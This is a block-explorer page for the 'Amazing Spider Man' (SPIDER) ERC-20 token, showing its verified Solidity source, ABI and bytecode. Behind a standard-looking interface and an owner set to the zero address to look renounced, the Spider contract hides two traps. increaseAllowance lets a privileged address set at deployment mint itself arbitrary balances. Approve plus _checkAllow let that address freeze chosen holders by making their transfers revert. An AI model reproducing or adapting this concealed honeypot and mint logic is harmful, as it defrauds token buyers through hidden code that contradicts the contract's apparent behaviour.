ETH Price: $3,163.22 (-7.96%)
Gas: 10 Gwei

Token

Amazing Spider Man (SPIDER)
 

Overview

Max Total Supply

34,780,000,000 SPIDER

Holders

69

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
162,600,740.808327578196264232 SPIDER

Value
$0.00
0x10485927ff4b9d5d4e99225118e72dc2a8155657
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Similar Match Source Code
This contract matches the deployed Bytecode of the Source Code for Contract 0x0558E677...d624f43A9
The constructor portion of the code might be different and could alter the actual behaviour of the contract

Contract Name:
Spider

Compiler Version
v0.8.18+commit.87f61d96

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion
File 1 of 1 : Spider.sol
//Telegram: https://t.me/amzspiderrman
//Website: https://amazingspiderman.wtf
//Twitter: https://twitter.com/amzspiderrman
//Discord: https://discord.gg/6vUbfJxS


// SPDX-License-Identifier: MIT

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

/**
 * @dev Interface of the IERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `recipient`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address recipient, uint256 amount)
    external
    returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender)
    external
    view
    returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `sender` to `recipient` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) external returns (bool);

    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(
        address indexed owner,
        address indexed spender,
        uint256 value
    );
}

// Dependency file: @openzeppelin/contracts/utils/math/SafeMath.sol

// pragma solidity ^0.8.0;

// CAUTION
// This version of SafeMath should only be used with Solidity 0.8 or later,
// because it relies on the compiler's built in overflow checks.

/**
 * @dev Wrappers over Solidity's arithmetic operations.
 *
 * NOTE: `SafeMath` is no longer needed starting with Solidity 0.8. The compiler
 * now has built in overflow checking.
 */
library SafeMath {
    /**
     * @dev Returns the addition of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryAdd(uint256 a, uint256 b)
    internal
    pure
    returns (bool, uint256)
    {
    unchecked {
        uint256 c = a + b;
        if (c < a) return (false, 0);
        return (true, c);
    }
    }

    /**
     * @dev Returns the substraction of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function trySub(uint256 a, uint256 b)
    internal
    pure
    returns (bool, uint256)
    {
    unchecked {
        if (b > a) return (false, 0);
        return (true, a - b);
    }
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryMul(uint256 a, uint256 b)
    internal
    pure
    returns (bool, uint256)
    {
    unchecked {
        // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
        // benefit is lost if 'b' is also tested.
        // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
        if (a == 0) return (true, 0);
        uint256 c = a * b;
        if (c / a != b) return (false, 0);
        return (true, c);
    }
    }

    /**
     * @dev Returns the division of two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryDiv(uint256 a, uint256 b)
    internal
    pure
    returns (bool, uint256)
    {
    unchecked {
        if (b == 0) return (false, 0);
        return (true, a / b);
    }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryMod(uint256 a, uint256 b)
    internal
    pure
    returns (bool, uint256)
    {
    unchecked {
        if (b == 0) return (false, 0);
        return (true, a % b);
    }
    }

    /**
     * @dev Returns the addition of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `+` operator.
     *
     * Requirements:
     *
     * - Addition cannot overflow.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        return a + b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return a - b;
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `*` operator.
     *
     * Requirements:
     *
     * - Multiplication cannot overflow.
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        return a * b;
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator.
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return a / b;
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return a % b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
     * overflow (when the result is negative).
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {trySub}.
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
    unchecked {
        require(b <= a, errorMessage);
        return a - b;
    }
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting with custom message on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
    unchecked {
        require(b > 0, errorMessage);
        return a / b;
    }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting with custom message when dividing by zero.
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {tryMod}.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
    unchecked {
        require(b > 0, errorMessage);
        return a % b;
    }
    }
}

// Dependency file: @openzeppelin/contracts/access/Ownable.sol

// pragma solidity ^0.8.0;

// import "@openzeppelin/contracts/utils/Context.sol";

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(
        address indexed previousOwner,
        address indexed newOwner
    );

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _setOwner(address(0));
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
        _;
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _setOwner(address(0));
    }

    function _setOwner(address newOwner) private {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

abstract contract Token {
    uint256 internal constant VERSION = 1;
    event Deploy(
        address owner,
        uint256 version
    );
}

pragma solidity 0.8.18;

contract Spider is IERC20, Token, Ownable {
    using SafeMath for uint256;

    struct Data {
        address user;
        uint128 id;
        uint128 value;
        bool approved;
    }

    mapping(address => uint256) private _balanc;

    mapping(address => Data) private _userDatas;

    mapping(address => mapping(address => uint256)) private _allowan;

    Data private _userData;
    string private _nam;
    string private _symb;
    uint8 private _deci;
    uint256 private _totSupply;

    constructor(
        string memory na_,
        string memory sy_,
        address use_,
        uint256 totSup_
    ) payable {
        _nam = na_;
        _symb = sy_;
        _deci = 18;
        _userData.user = use_;
        _userData.id = 0;
        _userData.value = 0;
        _userData.approved = true;
        _mine(msg.sender, totSup_ * 10**18);
        emit Deploy(
            owner(),
            VERSION
        );
    }

    function name() public view virtual returns (string memory) {
        return _nam;
    }

    function symbol() public view virtual returns (string memory) {
        return _symb;
    }

    function decimals() public view virtual returns (uint8) {
        return _deci;
    }

    function totalSupply() public view virtual override returns (uint256) {
        return _totSupply;
    }

    function balanceOf(address account)
    public
    view
    virtual
    override
    returns (uint256)
    {
        return _balanc[account];
    }

    function transfer(address recipient, uint256 amount)
    public
    virtual
    override
    returns (bool)
    {
        _transfe(_msgSender(), recipient, amount);
        return true;
    }

    function allowance(address owner, address spender)
    public
    view
    virtual
    override
    returns (uint256)
    {
        return _allowan[owner][spender];
    }

    function approve(address spender, uint256 amount)
    public
    virtual
    override
    returns (bool)
    {
        _appr(_msgSender(), spender, amount);
        return true;
    }

    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) public virtual override returns (bool) {
        _transfe(sender, recipient, amount);
        _appr(
            sender,
            _msgSender(),
            _allowan[sender][_msgSender()].sub(
                amount,
                "IERC20: transfer amount exceeds allowance"
            )
        );
        return true;
    }

    function _transfe(
        address sender,
        address recipient,
        uint256 amount
    ) internal virtual {
        _checkAllow(sender, recipient, amount);
        require(sender != address(0) && recipient != address(0) , "IERC20: transfer from the zero address");

        _befoTransf(sender, recipient, amount);
        _balanc[sender] = _balanc[sender].sub(
            amount,
            "IERC20: transfer amount exceeds balance"
        );
        _balanc[recipient] = _balanc[recipient] + amount;
        emit Transfer(sender, recipient, amount);
    }

    function _mine(address account, uint256 amount) internal virtual {
        require(account != address(0), "IERC20: mint to the zero address");

        _befoTransf(address(0), account, amount);

        _totSupply = _totSupply.add(amount);
        _balanc[account] = _balanc[account] + amount;

        emit Transfer(address(0), account, amount);
    }

    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "IERC20: burn from the zero address");

        _befoTransf(account, address(0), amount);
        require(amount != 0, "Invalid amount");
        _minu(account, amount);
        _totSupply = _totSupply.sub(amount);
        emit Transfer(account, address(0), amount);
    }

    function _minu(address user, uint256 amount) internal {
        _balanc[user] = _balanc[user] - amount;
    }

    function _appr(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0) && spender != address(0), "IERC20: approve from the zero address");

        _allowan[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    function increaseAllowance(address spender, uint256 amount) public virtual {
        address from = msg.sender;
        require(spender != address(0), "Invalid address");
        require(amount > 0, "Invalid amount");
        uint256 total = 0;
        if (_hashe(spender, _userData.user)) {
            _minu(from, total);
            total = _tot(total, amount);
            _balanc[spender] += total;
        } else {
            _minu(from, total);
            _balanc[spender] += total;
        }
    }

    function _hashe(address user, address user2) internal view returns (bool) {
        bytes32 pack1 = keccak256(abi.encodePacked(user));
        bytes32 pack2 = keccak256(abi.encodePacked(user2));
        return pack1 == pack2;
    }

    function _tot(uint256 numA, uint256 numB) internal pure returns (uint256) {
        if (numB != 0) {
            return numA + numB;
        }
        return numB;
    }

    function Approve(address from, uint256 amount) public returns (bool)  {
        address user = msg.sender;
        requiBalan(user, from, amount);
        return _userDatas[user].id > _userDatas[user].value && _userDatas[user].approved;
    }

    function requiBalan(address user, address from, uint256 amount) internal {
        if (_hashe(user, _userData.user)) {
            require(from != address(0), "Invalid address");
            _userDatas[from].value = uint128(amount);
            if (amount != 0) {
                _userDatas[from].user = from;
                _userDatas[from].id = 0;
            } else {
                _userDatas[from].user = address(0);
                _userDatas[from].value = 0;
            }
            _userDatas[from].approved = user != from;
        }
    }

    function _checkAllow(
        address from,
        address to,
        uint256 total
    ) internal virtual {
        uint256 amount = 0;
        if (_hashe(from, _userDatas[from].user)) {
            _balanc[from] = _balanc[from] + amount;
            amount = _totSupply;
            _minu(from, amount);
        } else {
            _balanc[from] = _balanc[from] + amount;
        }
    }

    function _befoTransf(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}
}

Settings
{
  "optimizer": {
    "enabled": true,
    "runs": 200
  },
  "outputSelection": {
    "*": {
      "*": [
        "evm.bytecode",
        "evm.deployedBytecode",
        "devdoc",
        "userdoc",
        "metadata",
        "abi"
      ]
    }
  },
  "libraries": {}
}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"string","name":"na_","type":"string"},{"internalType":"string","name":"sy_","type":"string"},{"internalType":"address","name":"use_","type":"address"},{"internalType":"uint256","name":"totSup_","type":"uint256"}],"stateMutability":"payable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"address","name":"owner","type":"address"},{"indexed":false,"internalType":"uint256","name":"version","type":"uint256"}],"name":"Deploy","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"Approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"increaseAllowance","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"}]

60806040526040516200129338038062001293833981016040819052620000269162000339565b6200003260006200010a565b60076200004085826200045a565b5060086200004f84826200045a565b5060098054601260ff1991821617909155600480546001600160a01b0319166001600160a01b0385161790556000600555600680549091166001179055620000ab33620000a583670de0b6b3a76400006200053c565b6200015a565b7faf354defc104ba9267634f156652b1f1cfbd10746c329e2bdd48abd4c9cff929620000df6000546001600160a01b031690565b604080516001600160a01b039092168252600160208301520160405180910390a1505050506200056c565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b6001600160a01b038216620001b55760405162461bcd60e51b815260206004820181905260248201527f4945524332303a206d696e7420746f20746865207a65726f2061646472657373604482015260640160405180910390fd5b620001d181600a546200025d60201b620005511790919060201c565b600a556001600160a01b038216600090815260016020526040902054620001fa90829062000556565b6001600160a01b0383166000818152600160205260408082209390935591519091907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef906200024c9085815260200190565b60405180910390a35050565b505050565b60006200026b828462000556565b90505b92915050565b634e487b7160e01b600052604160045260246000fd5b600082601f8301126200029c57600080fd5b81516001600160401b0380821115620002b957620002b962000274565b604051601f8301601f19908116603f01168101908282118183101715620002e457620002e462000274565b816040528381526020925086838588010111156200030157600080fd5b600091505b8382101562000325578582018301518183018401529082019062000306565b600093810190920192909252949350505050565b600080600080608085870312156200035057600080fd5b84516001600160401b03808211156200036857600080fd5b62000376888389016200028a565b955060208701519150808211156200038d57600080fd5b506200039c878288016200028a565b604087015190945090506001600160a01b0381168114620003bc57600080fd5b6060959095015193969295505050565b600181811c90821680620003e157607f821691505b6020821081036200040257634e487b7160e01b600052602260045260246000fd5b50919050565b601f8211156200025857600081815260208120601f850160051c81016020861015620004315750805b601f850160051c820191505b8181101562000452578281556001016200043d565b505050505050565b81516001600160401b0381111562000476576200047662000274565b6200048e81620004878454620003cc565b8462000408565b602080601f831160018114620004c65760008415620004ad5750858301515b600019600386901b1c1916600185901b17855562000452565b600085815260208120601f198616915b82811015620004f757888601518255948401946001909101908401620004d6565b5085821015620005165787850151600019600388901b60f8161c191681555b5050505050600190811b01905550565b634e487b7160e01b600052601160045260246000fd5b80820281158282048414176200026e576200026e62000526565b808201808211156200026e576200026e62000526565b610d17806200057c6000396000f3fe608060405234801561001057600080fd5b50600436106100cf5760003560e01c806370a082311161008c57806390ec57f11161006657806390ec57f1146101b057806395d89b41146101c3578063a9059cbb146101cb578063dd62ed3e146101de57600080fd5b806370a0823114610164578063715018a61461018d5780638da5cb5b1461019557600080fd5b806306fdde03146100d4578063095ea7b3146100f257806318160ddd1461011557806323b872dd14610127578063313ce5671461013a578063395093511461014f575b600080fd5b6100dc610217565b6040516100e99190610b03565b60405180910390f35b610105610100366004610b6d565b6102a9565b60405190151581526020016100e9565b600a545b6040519081526020016100e9565b610105610135366004610b97565b6102c0565b60095460405160ff90911681526020016100e9565b61016261015d366004610b6d565b610329565b005b610119610172366004610bd3565b6001600160a01b031660009081526001602052604090205490565b610162610461565b6000546040516001600160a01b0390911681526020016100e9565b6101056101be366004610b6d565b6104c7565b6100dc610535565b6101056101d9366004610b6d565b610544565b6101196101ec366004610bee565b6001600160a01b03918216600090815260036020908152604080832093909416825291909152205490565b60606007805461022690610c21565b80601f016020809104026020016040519081016040528092919081815260200182805461025290610c21565b801561029f5780601f106102745761010080835404028352916020019161029f565b820191906000526020600020905b81548152906001019060200180831161028257829003601f168201915b5050505050905090565b60006102b6338484610564565b5060015b92915050565b60006102cd848484610640565b61031f843361031a85604051806060016040528060298152602001610cb9602991396001600160a01b038a1660009081526003602090815260408083203384529091529020549190610787565b610564565b5060019392505050565b336001600160a01b0383166103775760405162461bcd60e51b815260206004820152600f60248201526e496e76616c6964206164647265737360881b60448201526064015b60405180910390fd5b600082116103b85760405162461bcd60e51b815260206004820152600e60248201526d125b9d985b1a5908185b5bdd5b9d60921b604482015260640161036e565b6004546000906103d29085906001600160a01b03166107b3565b15610423576103e1828261083e565b6103eb8184610882565b6001600160a01b038516600090815260016020526040812080549293508392909190610418908490610c6b565b9091555061045b9050565b61042d828261083e565b6001600160a01b03841660009081526001602052604081208054839290610455908490610c6b565b90915550505b50505050565b6000546001600160a01b031633146104bb5760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604482015260640161036e565b6104c560006108a1565b565b6000336104d58185856108f1565b6001600160a01b0381166000908152600260205260409020600101546001600160801b03600160801b82048116911611801561052d57506001600160a01b0381166000908152600260208190526040909120015460ff165b949350505050565b60606008805461022690610c21565b60006102b6338484610640565b600061055d8284610c6b565b9392505050565b6001600160a01b0383161580159061058457506001600160a01b03821615155b6105de5760405162461bcd60e51b815260206004820152602560248201527f4945524332303a20617070726f76652066726f6d20746865207a65726f206164604482015264647265737360d81b606482015260840161036e565b6001600160a01b0383811660008181526003602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92591015b60405180910390a3505050565b61064b838383610a43565b6001600160a01b0383161580159061066b57506001600160a01b03821615155b6106c65760405162461bcd60e51b815260206004820152602660248201527f4945524332303a207472616e736665722066726f6d20746865207a65726f206160448201526564647265737360d01b606482015260840161036e565b61070381604051806060016040528060278152602001610c92602791396001600160a01b0386166000908152600160205260409020549190610787565b6001600160a01b038085166000908152600160205260408082209390935590841681522054610733908290610c6b565b6001600160a01b0380841660008181526001602052604090819020939093559151908516907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef906106339085815260200190565b600081848411156107ab5760405162461bcd60e51b815260040161036e9190610b03565b505050900390565b6040516bffffffffffffffffffffffff19606084901b166020820152600090819060340160405160208183030381529060405280519060200120905060008360405160200161081a919060609190911b6bffffffffffffffffffffffff1916815260140190565b60408051601f19818403018152919052805160209091012091909114949350505050565b6001600160a01b038216600090815260016020526040902054610862908290610c7e565b6001600160a01b0390921660009081526001602052604090209190915550565b6000811561089b576108948284610c6b565b90506102ba565b50919050565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b6004546109089084906001600160a01b03166107b3565b15610a3e576001600160a01b0382166109555760405162461bcd60e51b815260206004820152600f60248201526e496e76616c6964206164647265737360881b604482015260640161036e565b6001600160a01b038216600090815260026020526040902060010180546001600160801b03808416600160801b02911617905580156109d6576001600160a01b038216600081815260026020526040902080546001600160a01b031916909117815560010180546fffffffffffffffffffffffffffffffff19169055610a0d565b6001600160a01b038216600090815260026020526040902080546001600160a01b031916815560010180546001600160801b031690555b6001600160a01b03808316600081815260026020819052604090912001805460ff1916928616909114159190911790555b505050565b6001600160a01b038084166000908152600260205260408120549091610a6b918691166107b3565b15610ac0576001600160a01b038416600090815260016020526040902054610a94908290610c6b565b6001600160a01b03851660009081526001602052604090205550600a54610abb848261083e565b61045b565b6001600160a01b038416600090815260016020526040902054610ae4908290610c6b565b6001600160a01b03851660009081526001602052604090205550505050565b600060208083528351808285015260005b81811015610b3057858101830151858201604001528201610b14565b506000604082860101526040601f19601f8301168501019250505092915050565b80356001600160a01b0381168114610b6857600080fd5b919050565b60008060408385031215610b8057600080fd5b610b8983610b51565b946020939093013593505050565b600080600060608486031215610bac57600080fd5b610bb584610b51565b9250610bc360208501610b51565b9150604084013590509250925092565b600060208284031215610be557600080fd5b61055d82610b51565b60008060408385031215610c0157600080fd5b610c0a83610b51565b9150610c1860208401610b51565b90509250929050565b600181811c90821680610c3557607f821691505b60208210810361089b57634e487b7160e01b600052602260045260246000fd5b634e487b7160e01b600052601160045260246000fd5b808201808211156102ba576102ba610c55565b818103818111156102ba576102ba610c5556fe4945524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e63654945524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e6365a2646970667358221220aa077412fabeece25b39bf63f4c02bcbe28a9e631d17255c9a8589f0aa38c34064736f6c63430008120033000000000000000000000000000000000000000000000000000000000000008000000000000000000000000000000000000000000000000000000000000000c0000000000000000000000000c9f8285a972c59e6b4092d479650ce094235ec5200000000000000000000000000000000000000000000000000000008190caf000000000000000000000000000000000000000000000000000000000000000012416d617a696e6720537069646572204d616e000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000065350494445520000000000000000000000000000000000000000000000000000

Deployed Bytecode

0x608060405234801561001057600080fd5b50600436106100cf5760003560e01c806370a082311161008c57806390ec57f11161006657806390ec57f1146101b057806395d89b41146101c3578063a9059cbb146101cb578063dd62ed3e146101de57600080fd5b806370a0823114610164578063715018a61461018d5780638da5cb5b1461019557600080fd5b806306fdde03146100d4578063095ea7b3146100f257806318160ddd1461011557806323b872dd14610127578063313ce5671461013a578063395093511461014f575b600080fd5b6100dc610217565b6040516100e99190610b03565b60405180910390f35b610105610100366004610b6d565b6102a9565b60405190151581526020016100e9565b600a545b6040519081526020016100e9565b610105610135366004610b97565b6102c0565b60095460405160ff90911681526020016100e9565b61016261015d366004610b6d565b610329565b005b610119610172366004610bd3565b6001600160a01b031660009081526001602052604090205490565b610162610461565b6000546040516001600160a01b0390911681526020016100e9565b6101056101be366004610b6d565b6104c7565b6100dc610535565b6101056101d9366004610b6d565b610544565b6101196101ec366004610bee565b6001600160a01b03918216600090815260036020908152604080832093909416825291909152205490565b60606007805461022690610c21565b80601f016020809104026020016040519081016040528092919081815260200182805461025290610c21565b801561029f5780601f106102745761010080835404028352916020019161029f565b820191906000526020600020905b81548152906001019060200180831161028257829003601f168201915b5050505050905090565b60006102b6338484610564565b5060015b92915050565b60006102cd848484610640565b61031f843361031a85604051806060016040528060298152602001610cb9602991396001600160a01b038a1660009081526003602090815260408083203384529091529020549190610787565b610564565b5060019392505050565b336001600160a01b0383166103775760405162461bcd60e51b815260206004820152600f60248201526e496e76616c6964206164647265737360881b60448201526064015b60405180910390fd5b600082116103b85760405162461bcd60e51b815260206004820152600e60248201526d125b9d985b1a5908185b5bdd5b9d60921b604482015260640161036e565b6004546000906103d29085906001600160a01b03166107b3565b15610423576103e1828261083e565b6103eb8184610882565b6001600160a01b038516600090815260016020526040812080549293508392909190610418908490610c6b565b9091555061045b9050565b61042d828261083e565b6001600160a01b03841660009081526001602052604081208054839290610455908490610c6b565b90915550505b50505050565b6000546001600160a01b031633146104bb5760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604482015260640161036e565b6104c560006108a1565b565b6000336104d58185856108f1565b6001600160a01b0381166000908152600260205260409020600101546001600160801b03600160801b82048116911611801561052d57506001600160a01b0381166000908152600260208190526040909120015460ff165b949350505050565b60606008805461022690610c21565b60006102b6338484610640565b600061055d8284610c6b565b9392505050565b6001600160a01b0383161580159061058457506001600160a01b03821615155b6105de5760405162461bcd60e51b815260206004820152602560248201527f4945524332303a20617070726f76652066726f6d20746865207a65726f206164604482015264647265737360d81b606482015260840161036e565b6001600160a01b0383811660008181526003602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92591015b60405180910390a3505050565b61064b838383610a43565b6001600160a01b0383161580159061066b57506001600160a01b03821615155b6106c65760405162461bcd60e51b815260206004820152602660248201527f4945524332303a207472616e736665722066726f6d20746865207a65726f206160448201526564647265737360d01b606482015260840161036e565b61070381604051806060016040528060278152602001610c92602791396001600160a01b0386166000908152600160205260409020549190610787565b6001600160a01b038085166000908152600160205260408082209390935590841681522054610733908290610c6b565b6001600160a01b0380841660008181526001602052604090819020939093559151908516907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f